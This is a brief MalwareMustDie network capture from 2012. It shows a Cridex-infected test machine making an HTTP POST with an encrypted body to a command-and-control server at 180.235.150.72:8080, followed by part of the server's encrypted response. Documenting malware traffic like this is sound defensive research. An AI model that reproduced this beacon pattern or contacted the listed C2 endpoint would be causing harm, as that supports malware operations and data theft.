===========================================
MalwareMustDie - Cridex Network analysis
Facebook --> PluginDetect 0.7.9 --> BHEK2
@unixfreaxjp - Sun, 25 Nov 2012 15:20:20 GMT
===========================================

// TestPC ---> 180.235.150.72 HTTP-POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 180.235.150.72:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
.....T*K..N..t...H......I:...{....X{.C..l.?su.{.N....29..%.....<v..S..
z..-D/...y. 7.J0.!>...i..Z..K....}....k.9.i|....IGJ....H..e
...',.H.%..$..Y6....t..J..j....NSpb3p...:..J.....B?..v.)....C.]c.J+.o.
..~..I&]6pf.Z....:...K....'y}EC....J.I<2.5..O..KX,u-R..k..f.i2..#KZg."
..2..G\..~5"|..B...e........A.O..N..ic4..0...I......C.....UG..m..g.vt+
/.nw,l.HTTP/1.1 200 OK

// Receiving a long response below:

Server: nginx/1.0.10
Date: Sun, 25 Nov 2012 13:39:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding

f3b
/..PS..~:Pk1.$...|a8......$....S.yb....p......d.VR..+P....... .P*.&+.i
.d..>.....tM.c.B+..W..^.2.......X..qr.|I.zY`0N.{.O.WU...4,.9..^kK
2U...`........p..N..v...:O\dy.:.W.b."...]..Y...0.l.......m%.).=..N=..
  :
  long one...
  :
zL..!..B............7..PS3..x...}.Q.s.4Ntm5K;t~p..0.....2%../*...Cd.J.
...!D..5Q8...'E>-..5.*A...B6.h..=X.z.Y......[..;-....vm.h.aN.RX.(V...!
..@a....M.@.+.ji.....C..U.S.e_...^......g?.<..-..^.xe.....`........%..
Z.2..../.
0

// #MalwareMustDie!